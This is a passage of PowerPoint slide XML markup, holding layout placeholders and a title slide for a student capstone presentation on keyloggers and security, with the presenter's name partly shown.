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60" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId2"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="269" r:id="rId3"/>
    <p:sldId id="270" r:id="rId4"/>
    <p:sldId id="271" r:id="rId5"/>
    <p:sldId id="272" r:id="rId6"/>
    <p:sldId id="273" r:id="rId7"/>
    <p:sldId id="274" r:id="rId8"/>
    <p:sldId id="275" r:id="rId9"/>
    <p:sldId id="276" r:id="rId10"/>
    <p:sldId id="277" r:id="rId11"/>
    <p:sldId id="278" r:id="rId12"/>
    <p:sldId id="279"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p:scale>
          <a:sx n="1" d="2"/>
          <a:sy n="1" d="2"/>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lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048586" name="Date Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{ED291B17-9318-49DB-B28B-6E5994AE9581}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>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2" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048639" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="702156"/>
            <a:ext cx="11029616" cy="1013800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048640"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1" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{2CED4963-E985-44C4-B8C4-FDD613B7C2F8}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048642" name="Footer Placeholder 4"/>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0" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048624"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endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048626"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27"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0" name="Date Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{ED291B17-9318-49DB-B28B-6E5994AE9581}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048631"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2" name="Slide Number Placeholder 12"/>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endParaRPr lang="en-US"/>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94" name="Date Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>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3" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048644"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5"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endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048646"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endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048647" name="Date Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{B2497495-0637-405E-AE64-5CC7506D51F5}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048648" name="Footer Placeholder 8"/>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3" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048605" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581193" y="729658"/>
            <a:ext cx="11029616" cy="492855"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048606" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581193" y="1391479"/>
            <a:ext cx="5194767" cy="4469572"/>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07" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6416039" y="1391479"/>
            <a:ext cx="5194769" cy="4469572"/>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08" name="Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{7BFFD690-9426-415D-8B65-26881E07B2D4}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048609" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="6423914"/>
            <a:ext cx="6917210" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048610"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endParaRPr lang="en-US"/>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endParaRPr lang="en-US"/>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5" name="Date Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{04C4989A-474C-40DE-95B9-011C28B71673}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>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8" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048619" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="575894" y="729658"/>
            <a:ext cx="11029616" cy="592246"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048620" name="Date Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{5DB4ED54-5B5E-4A04-93D3-5772E3CE3818}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048621" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581192" y="6423914"/>
            <a:ext cx="6917210" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048622" name="Slide Number Placeholder 4"/>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endParaRPr lang="en-US"/>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endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048634"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lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048635"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36" name="Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{7E18DB4A-8810-4A10-AD5C-D5E2C667F5B3}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048637"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8"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endParaRPr lang="en-US"/>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70" latinLnBrk="0" marL="30607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70" latinLnBrk="0" marL="62992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69875" latinLnBrk="0" marL="899795"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315" latinLnBrk="0" marL="124206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315" latinLnBrk="0" marL="1602105"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89992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27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49999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79971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altLang="en-US" b="1" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" b="1" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" b="1" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" b="1" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" b="1" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" b="1" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" b="1" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" b="1" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" b="1" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" b="1" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" b="1" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" b="1" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" b="1" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" b="1" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" b="1" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" b="1" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" b="1" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" b="1" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" b="1" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" b="1" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" b="1" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" b="1" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" b="1" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:endParaRPr altLang="en-US" lang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048590" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-329782" y="1034321"/>
            <a:ext cx="12726648" cy="472440"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" bIns="45720" lIns="91440" rIns="91440" rtlCol="0" tIns="45720" wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr b="1" sz="3200" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>CAPSTONE PROJECT</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3200" lang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204"/>
              <a:cs typeface="Arial" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048591" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3117529" y="4586365"/>
            <a:ext cx="7980183" cy="574041"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" bIns="45720" lIns="91440" rIns="91440" rtlCol="0" tIns="45720" wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Presented By:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2000" lang="en-US">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-IN" b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-IN" b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-IN" b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-IN" b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>J</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-IN" b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-IN" b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Y</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-IN" b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-IN" b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>K</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-IN" b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-IN" b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-IN" b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-IN" b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
